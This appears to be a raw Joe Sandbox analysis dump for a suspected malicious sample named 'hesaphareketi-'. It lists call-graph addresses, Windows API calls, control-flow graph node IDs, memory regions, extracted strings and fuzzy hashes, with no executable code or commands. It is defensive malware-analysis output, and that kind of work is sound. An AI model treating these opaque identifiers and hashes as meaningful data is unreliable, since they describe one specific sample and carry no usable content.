57302f7 57508->57509 57518 5732050 57509->57518 57523 5732038 57509->57523 57510 5730331 57510->57505 57514 57302f7 57513->57514 57516 5732050 CreateWindowExW 57514->57516 57517 5732038 CreateWindowExW 57514->57517 57515 5730331 57515->57505 57516->57515 57517->57515 57519 573208d 57518->57519 57520 5732081 57518->57520 57519->57510 57520->57519 57528 5732e99 57520->57528 57533 5732ea8 57520->57533 57524 573208d 57523->57524 57525 5732081 57523->57525 57524->57510 57525->57524 57526 5732e99 CreateWindowExW 57525->57526 57527 5732ea8 CreateWindowExW 57525->57527 57526->57524 57527->57524 57529 5732ea0 57528->57529 57530 5732e44 57529->57530 57538 5734171 57529->57538 57542 5734180 57529->57542 57530->57519 57534 5732ea9 57533->57534 57535 5732f82 57534->57535 57536 5734171 CreateWindowExW 57534->57536 57537 5734180 CreateWindowExW 57534->57537 57536->57535 57537->57535 57539 5734180 57538->57539 57545 57335f0 57539->57545 57543 57335f0 CreateWindowExW 57542->57543 57544 57341b5 57543->57544 57544->57530 57546 57341d0 CreateWindowExW 57545->57546 57548 57342f4 57546->57548 57548->57548 57742 99d1b4 57744 99d1cc 57742->57744 57743 99d226 57744->57743 57749 57350d8 57744->57749 57755 573361c 57744->57755 57761 5734388 57744->57761 57765 5734378 57744->57765 57750 57350e0 57749->57750 57751 5735147 57750->57751 57769 5735261 57750->57769 57774 573533c 57750->57774 57780 5735270 57750->57780 57757 5733627 57755->57757 57756 5735147 57757->57756 57758 5735261 CallWindowProcW 57757->57758 57759 5735270 CallWindowProcW 57757->57759 57760 573533c CallWindowProcW 57757->57760 57758->57756 57759->57756 57760->57756 57762 57343ae 57761->57762 57763 573361c CallWindowProcW 57762->57763 57764 57343cf 57763->57764 57764->57743 57766 573437c 57765->57766 57767 573361c CallWindowProcW 57766->57767 57768 57343cf 57767->57768 57768->57743 57771 5735264 57769->57771 57770 5735310 57770->57751 57785 5735319 57771->57785 57789 5735328 57771->57789 57775 57352fa 57774->57775 57776 573534a 57774->57776 57778 5735319 CallWindowProcW 57775->57778 57779 5735328 CallWindowProcW 57775->57779 57777 5735310 57777->57751 57778->57777 57779->57777 57782 5735271 57780->57782 57781 5735310 57781->57751 57783 5735319 CallWindowProcW 57782->57783 57784 5735328 CallWindowProcW 57782->57784 57783->57781 57784->57781 57786 573531c 57785->57786 57787 5735339 57786->57787 57793 5736674 57786->57793 57787->57770 57790 5735329 57789->57790 57791 5735339 57790->57791 57792 5736674 CallWindowProcW 57790->57792 57791->57770 57792->57791 57794 5736678 57793->57794 57795 57366e1 57794->57795 57797 57367be 57794->57797 57795->57787 57798 57367d2 57797->57798 57800 57367d9 57797->57800 57799 573682a CallWindowProcW 57798->57799 57798->57800 57799->57800 57801 dfd630 57804 dfd71a 57801->57804 57802 dfd63f 57805 dfd739 57804->57805 57806 dfd75c 57804->57806 57805->57806 57812 dfd9b8 57805->57812 57816 dfd9c0 57805->57816 57806->57802 57807 dfd754 57807->57806 57808 dfd960 GetModuleHandleW 57807->57808 57809 dfd98d 57808->57809 57809->57802 57813 dfd9d4 57812->57813 57814 dfd9f9 57813->57814 57820 dfd420 57813->57820 57814->57807 57817 dfd9d4 57816->57817 57818 dfd9f9 57817->57818 57819 dfd420 LoadLibraryExW 57817->57819 57818->57807 57819->57818 57822 dfdb80 LoadLibraryExW 57820->57822 57823 dfdbf9 57822->57823 57823->57814 57844 dff9a0 57845 dff9e6 57844->57845 57848 dffb80 57845->57848 57851 dff758 57848->57851 57852 dffbe8 DuplicateHandle 57851->57852 57853 dffad3 57852->57853

                                            Executed Functions

                                            Function 0573ACA8 Relevance: 30.9, Strings: 23, Instructions: 2163COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1014 573aca8-573afbf call 573a6d4 * 4 call 573a9e0 call 573a9f0 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573a6d4 call 573aa10 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573a6d4 call 5730380 * 2 1596 573afc2 call 577d7a0 1014->1596 1597 573afc2 call 577d790 1014->1597 1113 573afc5-573b3e3 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573aa20 call 573aa30 call 573aa40 call 573aa50 1600 573b3e3 call 577e858 1113->1600 1601 573b3e3 call 577e848 1113->1601 1167 573b3e9-573b48d 1598 573b48f call 577eff3 1167->1598 1599 573b48f call 577f000 1167->1599 1177 573b495-573b4d7 1182 573d1c6-573d1fa call 573ab80 1177->1182 1183 573b4dd-573b4fd 1177->1183 1190 573d1ff-573d20f 1182->1190 1183->1182 1186 573b503-573b518 1183->1186 1186->1182 1191 573b51e-573b54a 1186->1191 1196 573b551-573d1c5 call 573aa60 call 573aa70 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573aa80 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa90 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573aaa0 call 573aab0 call 573aac0 call 573aad0 call 573aa20 call 573aa30 call 573aae0 call 573aaf0 call 573aa40 call 573aa50 call 573ab00 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573ab10 call 573ab20 call 573ab30 call 573aa80 * 22 call 573aa90 call 573ab40 call 573ab50 call 573aa30 call 573ab60 call 5737bd8 call 573053c call 573ab70 call 573053c call 573ab70 1191->1196 1596->1113 1597->1113 1598->1177 1599->1177 1600->1167 1601->1167
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "$"$"$"$"$"$"$0$0$0$1$1$1$1$1$1$1$9$n$n$n$|$|
                                            • API String ID: 0-2245056881
                                            • Opcode ID: d8e208973bed5a41a295023df08c1a529ea000a359d66f997ab65dfe0d7bbfe7
                                            • Instruction ID: 74d2228cd02a9647ccbac0b421846067857eb786153ea790b94772d23a6db813
                                            • Opcode Fuzzy Hash: d8e208973bed5a41a295023df08c1a529ea000a359d66f997ab65dfe0d7bbfe7
                                            • Instruction Fuzzy Hash: 4A332830A10719CFCB65DF34C859A99B7B2FF89304F5085A9E14AAB361DB31AE85DF40
                                            Function 0573AC98 Relevance: 30.9, Strings: 23, Instructions: 2139COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1602 573ac98-573acc8 1603 573acd2-573acd6 call 573a6d4 1602->1603 1605 573acdb-573ad5e call 573a6d4 * 3 call 573a9e0 1603->1605 1623 573ad68-573ad6c call 573a9f0 1605->1623 1625 573ad71-573aec6 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573a6d4 1623->1625 1671 573aed0-573aed4 call 573aa10 1625->1671 1673 573aed9-573afa3 call 573aa00 call 573a9f0 call 573aa00 call 573a9f0 call 573a6d4 call 5730380 * 2 1671->1673 1700 573afac-573afbf 1673->1700 2186 573afc2 call 577d7a0 1700->2186 2187 573afc2 call 577d790 1700->2187 1701 573afc5-573b04a call 573aa20 call 573aa30 1708 573b04f-573b084 call 573aa40 1701->1708 1710 573b089-573b3cc call 573aa50 call 573aa60 call 573aa70 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573aa20 call 573aa30 call 573aa40 1708->1710 1752 573b3d1-573b3e3 call 573aa50 1710->1752 2184 573b3e3 call 577e858 1752->2184 2185 573b3e3 call 577e848 1752->2185 1755 573b3e9-573b46f 1763 573b479-573b48d 1755->1763 2188 573b48f call 577eff3 1763->2188 2189 573b48f call 577f000 1763->2189 1765 573b495-573b498 1766 573b49f-573b4a8 1765->1766 1767 573b4b4-573b4bc 1766->1767 1768 573b4c6-573b4cd 1767->1768 1769 573b4d3-573b4d7 1768->1769 1770 573d1c6-573d1db 1769->1770 1771 573b4dd-573b4fd 1769->1771 1775 573d1e0-573d1fa call 573ab80 1770->1775 1771->1770 1774 573b503-573b518 1771->1774 1774->1770 1779 573b51e-573b53a 1774->1779 1778 573d1ff-573d20f 1775->1778 1783 573b544-573b54a 1779->1783 1784 573b551-573d1c5 call 573aa60 call 573aa70 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573aa80 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa90 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573aaa0 call 573aab0 call 573aac0 call 573aad0 call 573aa20 call 573aa30 call 573aae0 call 573aaf0 call 573aa40 call 573aa50 call 573ab00 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa20 call 573aa30 call 573aa40 call 573aa50 call 573aa60 call 573aa70 call 573ab10 call 573ab20 call 573ab30 call 573aa80 * 22 call 573aa90 call 573ab40 call 573ab50 call 573aa30 call 573ab60 call 5737bd8 call 573053c call 573ab70 call 573053c call 573ab70 1783->1784 2184->1755 2185->1755 2186->1701 2187->1701 2188->1765 2189->1765
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "$"$"$"$"$"$"$0$0$0$1$1$1$1$1$1$1$9$n$n$n$|$|
                                            • API String ID: 0-2245056881
                                            • Opcode ID: 4018f982a558dcabb32bb60bc6d804d23eefdb5e8d32398d9cc0bac0c2848767
                                            • Instruction ID: d37eac48a31ec6096f47d6c0b9fb6666d9eba8334d218a014a312353e810827a
                                            • Opcode Fuzzy Hash: 4018f982a558dcabb32bb60bc6d804d23eefdb5e8d32398d9cc0bac0c2848767
                                            • Instruction Fuzzy Hash: 59332830A10719CFCB65DF34C859A99B7B2FF89304F5085A9E14AAB361DB31AE85DF40
                                            Function 00DF7310 Relevance: 4.7, Strings: 3, Instructions: 941COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2207 df7310-df7374 2209 df737a-df74f0 2207->2209 2210 df7913-df7930 2207->2210 2342 df752a-df752c 2209->2342 2343 df74f2-df7528 2209->2343 2213 df79a7-df79f0 2210->2213 2214 df7932-df7956 2210->2214 2225 df79fd-df7a05 2213->2225 2226 df79f2-df79f8 2213->2226 2218 df795c-df7967 2214->2218 2219 df7f89-df7fa5 2214->2219 2218->2219 2220 df796d-df7985 2218->2220 2234 df7fb0-df7fb7 2219->2234 2220->2219 2223 df798b-df79a6 call df0210 2220->2223 2230 df7a2b 2225->2230 2231 df7a07-df7a29 2225->2231 2229 df7a93-df7ad6 2226->2229 2242 df7ad8-df7b04 2229->2242 2243 df7b53-df7bce 2229->2243 2232 df7a32-df7a34 2230->2232 2231->2232 2235 df7a3a-df7a50 2232->2235 2236 df7a36-df7a38 2232->2236 2239 df7fb9-df7fc1 2234->2239 2240 df7fd1-df7ff7 2234->2240 2235->2229 2250 df7a52-df7a55 2235->2250 2236->2229 2239->2240 2244 df7fc3-df7fd0 2239->2244 2248 df7ff9-df8009 2240->2248 2249 df8037-df804f 2240->2249 2242->2219 2256 df7b0a-df7b11 2242->2256 2243->2219 2255 df7bd4-df7bfd 2243->2255 2265 df800b-df801f 2248->2265 2266 df8026-df802d 2248->2266 2262 df806c-df8070 2249->2262 2263 df8051-df8065 2249->2263 2253 df7a5b-df7a63 2250->2253 2253->2219 2260 df7a69-df7a91 2253->2260 2255->2219 2261 df7c03-df7c10 2255->2261 2256->2219 2258 df7b17-df7b23 2256->2258 2258->2219 2264 df7b29-df7b35 2258->2264 2260->2229 2260->2253 2261->2219 2268 df7c16-df7c32 2261->2268 2262->2249 2270 df8072-df8076 2262->2270 2263->2262 2264->2219 2269 df7b3b-df7b4b 2264->2269 2265->2266 2273 df802f-df8036 2266->2273 2274 df8077-df8085 2266->2274 2271 df7cbf-df7ceb 2268->2271 2272 df7c38-df7c3e 2268->2272 2269->2243 2275 df7ced-df7cf1 2271->2275 2276 df7d43-df7d55 2271->2276 2280 df7c6b-df7c80 2272->2280 2281 df7c40-df7c65 2272->2281 2292 df8087-df80dd 2274->2292 2293 df80e0-df80e2 2274->2293 2275->2276 2282 df7cf3 2275->2282 2283 df7d5e-df7d62 2276->2283 2284 df7d57-df7d5c 2276->2284 2280->2219 2286 df7c86-df7ca5 2280->2286 2281->2280 2287 df7cf8-df7d06 2282->2287 2283->2219 2290 df7d68-df7d70 2283->2290 2289 df7dc4-df7dcb 2284->2289 2286->2219 2295 df7cab-df7cb9 2286->2295 2287->2219 2298 df7d0c-df7d21 2287->2298 2296 df7dcd-df7ddd 2289->2296 2297 df7e35-df7e55 2289->2297 2290->2219 2299 df7d76-df7d83 2290->2299 2292->2293 2295->2271 2295->2272 2296->2297 2301 df7ddf-df7df7 2296->2301 2315 df7e58-df7e81 2297->2315 2298->2219 2302 df7d27-df7d34 2298->2302 2299->2219 2303 df7d89-df7d96 2299->2303 2312 df7df9 2301->2312 2313 df7e23-df7e33 call df0210 2301->2313 2302->2219 2306 df7d3a-df7d41 2302->2306 2303->2219 2307 df7d9c-df7db9 2303->2307 2306->2276 2306->2287 2307->2289 2317 df7dfc-df7dfe 2312->2317 2313->2315 2319 df7f0c-df7f1f 2315->2319 2320 df7e87-df7f09 2315->2320 2317->2219 2321 df7e04-df7e12 2317->2321 2325 df7f7e-df7f88 2319->2325 2326 df7f21-df7f5a 2319->2326 2320->2319 2321->2219 2324 df7e18-df7e21 2321->2324 2324->2313 2324->2317 2326->2325 2336 df7f5c-df7f78 2326->2336 2336->2325 2344 df752e-df7530 2342->2344 2345 df7532-df753c 2342->2345 2343->2342 2347 df753e-df7556 2344->2347 2345->2347 2348 df755c-df7564 2347->2348 2349 df7558-df755a 2347->2349 2352 df7566-df756b 2348->2352 2349->2352 2353 df756d-df7580 2352->2353 2354 df7585-df75ae 2352->2354 2353->2354 2358 df75e4-df75ee 2354->2358 2359 df75b0-df75bc 2354->2359 2361 df75f7-df7683 2358->2361 2362 df75f0 2358->2362 2359->2358 2360 df75be-df75cb 2359->2360 2365 df75cd-df75cf 2360->2365 2366 df75d1-df75de 2360->2366 2372 df7685-df76c2 2361->2372 2373 df76c4-df76d2 2361->2373 2362->2361 2365->2358 2366->2358 2376 df76dd-df7717 2372->2376 2373->2376 2393 df771a call df8481 2376->2393 2394 df771a call df83d0 2376->2394 2395 df771a call df83e0 2376->2395 2380 df7720-df77b0 2385 df77de-df77fa 2380->2385 2386 df77b2-df77dc 2380->2386 2389 df77fc 2385->2389 2390 df7808-df7809 2385->2390 2386->2385 2389->2390 2390->2210 2393->2380 2394->2380 2395->2380
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq$LRq$\sq
                                            • API String ID: 0-3677092283
                                            • Opcode ID: 995e7bce323e76e314240aadcad71ef5a38e2233d78c646c2a16cbae80da9332
                                            • Instruction ID: fef44899c6d80bb937c1eb9efef3f3bb51b36fb1d94d2637e270d2f4769a9463
                                            • Opcode Fuzzy Hash: 995e7bce323e76e314240aadcad71ef5a38e2233d78c646c2a16cbae80da9332
                                            • Instruction Fuzzy Hash: 52828D31A152198FCB14DF69D880AADBBF2BF88301F59C569E016EB355D734E942CF90
                                            Function 00DF72FE Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2418 df72fe-df7305 2419 df7307-df7348 2418->2419 2420 df7360 2418->2420 2421 df736d-df7374 2419->2421 2420->2421 2422 df7362-df736c 2420->2422 2423 df737a-df74f0 2421->2423 2424 df7913-df7930 2421->2424 2556 df752a-df752c 2423->2556 2557 df74f2-df7528 2423->2557 2427 df79a7-df79f0 2424->2427 2428 df7932-df7956 2424->2428 2439 df79fd-df7a05 2427->2439 2440 df79f2-df79f8 2427->2440 2432 df795c-df7967 2428->2432 2433 df7f89-df7fa5 2428->2433 2432->2433 2434 df796d-df7985 2432->2434 2448 df7fb0-df7fb7 2433->2448 2434->2433 2437 df798b-df79a6 call df0210 2434->2437 2444 df7a2b 2439->2444 2445 df7a07-df7a29 2439->2445 2443 df7a93-df7ad6 2440->2443 2456 df7ad8-df7b04 2443->2456 2457 df7b53-df7bce 2443->2457 2446 df7a32-df7a34 2444->2446 2445->2446 2449 df7a3a-df7a50 2446->2449 2450 df7a36-df7a38 2446->2450 2453 df7fb9-df7fc1 2448->2453 2454 df7fd1-df7ff7 2448->2454 2449->2443 2464 df7a52-df7a55 2449->2464 2450->2443 2453->2454 2458 df7fc3-df7fd0 2453->2458 2462 df7ff9-df8009 2454->2462 2463 df8037-df804f 2454->2463 2456->2433 2470 df7b0a-df7b11 2456->2470 2457->2433 2469 df7bd4-df7bfd 2457->2469 2479 df800b-df801f 2462->2479 2480 df8026-df802d 2462->2480 2476 df806c-df8070 2463->2476 2477 df8051-df8065 2463->2477 2467 df7a5b-df7a63 2464->2467 2467->2433 2474 df7a69-df7a91 2467->2474 2469->2433 2475 df7c03-df7c10 2469->2475 2470->2433 2472 df7b17-df7b23 2470->2472 2472->2433 2478 df7b29-df7b35 2472->2478 2474->2443 2474->2467 2475->2433 2482 df7c16-df7c32 2475->2482 2476->2463 2484 df8072-df8076 2476->2484 2477->2476 2478->2433 2483 df7b3b-df7b4b 2478->2483 2479->2480 2487 df802f-df8036 2480->2487 2488 df8077-df8085 2480->2488 2485 df7cbf-df7ceb 2482->2485 2486 df7c38-df7c3e 2482->2486 2483->2457 2489 df7ced-df7cf1 2485->2489 2490 df7d43-df7d55 2485->2490 2494 df7c6b-df7c80 2486->2494 2495 df7c40-df7c65 2486->2495 2506 df8087-df80dd 2488->2506 2507 df80e0-df80e2 2488->2507 2489->2490 2496 df7cf3 2489->2496 2497 df7d5e-df7d62 2490->2497 2498 df7d57-df7d5c 2490->2498 2494->2433 2500 df7c86-df7ca5 2494->2500 2495->2494 2501 df7cf8-df7d06 2496->2501 2497->2433 2504 df7d68-df7d70 2497->2504 2503 df7dc4-df7dcb 2498->2503 2500->2433 2509 df7cab-df7cb9 2500->2509 2501->2433 2512 df7d0c-df7d21 2501->2512 2510 df7dcd-df7ddd 2503->2510 2511 df7e35-df7e55 2503->2511 2504->2433 2513 df7d76-df7d83 2504->2513 2506->2507 2509->2485 2509->2486 2510->2511 2515 df7ddf-df7df7 2510->2515 2529 df7e58-df7e81 2511->2529 2512->2433 2516 df7d27-df7d34 2512->2516 2513->2433 2517 df7d89-df7d96 2513->2517 2526 df7df9 2515->2526 2527 df7e23-df7e33 call df0210 2515->2527 2516->2433 2520 df7d3a-df7d41 2516->2520 2517->2433 2521 df7d9c-df7db9 2517->2521 2520->2490 2520->2501 2521->2503 2531 df7dfc-df7dfe 2526->2531 2527->2529 2533 df7f0c-df7f1f 2529->2533 2534 df7e87-df7f09 2529->2534 2531->2433 2535 df7e04-df7e12 2531->2535 2539 df7f7e-df7f88 2533->2539 2540 df7f21-df7f5a 2533->2540 2534->2533 2535->2433 2538 df7e18-df7e21 2535->2538 2538->2527 2538->2531 2540->2539 2550 df7f5c-df7f78 2540->2550 2550->2539 2558 df752e-df7530 2556->2558 2559 df7532-df753c 2556->2559 2557->2556 2561 df753e-df7556 2558->2561 2559->2561 2562 df755c-df7564 2561->2562 2563 df7558-df755a 2561->2563 2566 df7566-df756b 2562->2566 2563->2566 2567 df756d-df7580 2566->2567 2568 df7585-df75ae 2566->2568 2567->2568 2572 df75e4-df75ee 2568->2572 2573 df75b0-df75bc 2568->2573 2575 df75f7-df7683 2572->2575 2576 df75f0 2572->2576 2573->2572 2574 df75be-df75cb 2573->2574 2579 df75cd-df75cf 2574->2579 2580 df75d1-df75de 2574->2580 2586 df7685-df76c2 2575->2586 2587 df76c4-df76d2 2575->2587 2576->2575 2579->2572 2580->2572 2590 df76dd-df7717 2586->2590 2587->2590 2607 df771a call df8481 2590->2607 2608 df771a call df83d0 2590->2608 2609 df771a call df83e0 2590->2609 2594 df7720-df77b0 2599 df77de-df77fa 2594->2599 2600 df77b2-df77dc 2594->2600 2603 df77fc 2599->2603 2604 df7808-df7809 2599->2604 2600->2599 2603->2604 2604->2424 2607->2594 2608->2594 2609->2594
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq$\sq
                                            • API String ID: 0-576302416
                                            • Opcode ID: 184e83da027e8fb50aa9e538012bff4c36437863a986d2ae109a3617da059e5f
                                            • Instruction ID: 4d12195ff00ef9ecb0a968423c38f99ebeb2956a2da0bf9eae0f43419888a3d8
                                            • Opcode Fuzzy Hash: 184e83da027e8fb50aa9e538012bff4c36437863a986d2ae109a3617da059e5f
                                            • Instruction Fuzzy Hash: 9DD17C35A152298FDB14DF69D840AAEB7F2BFC8310F16C529E416EB354DB34A906CF90
                                            Function 07575409 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Teq
                                            • API String ID: 0-1098410595
                                            • Opcode ID: d70e697a093eeef5b7a29eb0a03a06c48ec142f0f152cfedd726519fb1c6da55
                                            • Instruction ID: f98988692d69ace8ee04ebf9026178b267d1f9fa618b2fcfe846b1d297f593a1
                                            • Opcode Fuzzy Hash: d70e697a093eeef5b7a29eb0a03a06c48ec142f0f152cfedd726519fb1c6da55
                                            • Instruction Fuzzy Hash: 28412CB0D18208CFDB14CFA9D5446EEBBF6BF8A300F14942AE409AB355EB345915CF40
                                            Function 05775CF8 Relevance: .6, Instructions: 588COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44923476edea73dc01a4a13720a6184d1fdd7c406d75b0849bbbf63462ab1230
                                            • Instruction ID: e0dc961d63e48cce8014660abb275283b91a94129df33376f4dae1820d2c3944
                                            • Opcode Fuzzy Hash: 44923476edea73dc01a4a13720a6184d1fdd7c406d75b0849bbbf63462ab1230
                                            • Instruction Fuzzy Hash: B6523D34A003198FDB14DF24C844B99B7B2FF89314F2582A9D5596F3A2DB71AD86CF81
                                            Function 05775CE8 Relevance: .6, Instructions: 588COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23946a9c95a468f6f4eab9ff90024f4a5234bdb68b3ca440d8150ee872e2c739
                                            • Instruction ID: b3a9c7bbc7b256989587c79b630b6989d69cc52dd6fff4fceb013e9e6f96cdf7
                                            • Opcode Fuzzy Hash: 23946a9c95a468f6f4eab9ff90024f4a5234bdb68b3ca440d8150ee872e2c739
                                            • Instruction Fuzzy Hash: 46524C34A003598FDB14DF28C844B99B7B2BF85314F2582E9D5586F3A2DB71AD86CF81
                                            Function 0A8C0040 Relevance: .3, Instructions: 334COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd0bd6011086a5d201722bff63912621745591f450a34f0b42b4d23e595708eb
                                            • Instruction ID: 50e4a8d56f20d17a91af2a07d16249ff74b6704ba7734e2f554b0ff70382d9a0
                                            • Opcode Fuzzy Hash: bd0bd6011086a5d201722bff63912621745591f450a34f0b42b4d23e595708eb
                                            • Instruction Fuzzy Hash: A2C19A71710608CFDB29DB75C960BAEB7F6AF88740F15846ED146CB291EB34E902CB61
                                            Function 00DF83E0 Relevance: .2, Instructions: 235COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4509ae9af166de73fccd5720252390ea7fe8275fafbac5404b741930a8b32920
                                            • Instruction ID: 519ce105e680df956ecd3bd92b30617466256f438ccbc985f0f83bb25fb3fd1b
                                            • Opcode Fuzzy Hash: 4509ae9af166de73fccd5720252390ea7fe8275fafbac5404b741930a8b32920
                                            • Instruction Fuzzy Hash: 1D815B32F106298FD754DB69D880B6EB7E3AFC8710F1A8165E409EB355DE34EC019B91
                                            Function 00DF8481 Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba279d39a7b5c0af83b23b9be4b5eea33151dd797f0e636e50f0c4ecc39f018d
                                            • Instruction ID: 3b698d0344310dc2851f002c553dd0d4b08c28e0024d1dec3ee293a26a402c4e
                                            • Opcode Fuzzy Hash: ba279d39a7b5c0af83b23b9be4b5eea33151dd797f0e636e50f0c4ecc39f018d
                                            • Instruction Fuzzy Hash: 5F611C32F106298FD754DB69C880B6EB7A3AFC8710F1AC165E409DB35ADE74EC019B91
                                            Function 0757E2A5 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e223e0cf7528d28a835d2bacb4a5131636a0547c9a15809ddd9c96a7665cb1e9
                                            • Instruction ID: 2e5e97630a62dded576ea871e933067d0afbbf978e0c4705d8276c2d7e9dcca1
                                            • Opcode Fuzzy Hash: e223e0cf7528d28a835d2bacb4a5131636a0547c9a15809ddd9c96a7665cb1e9
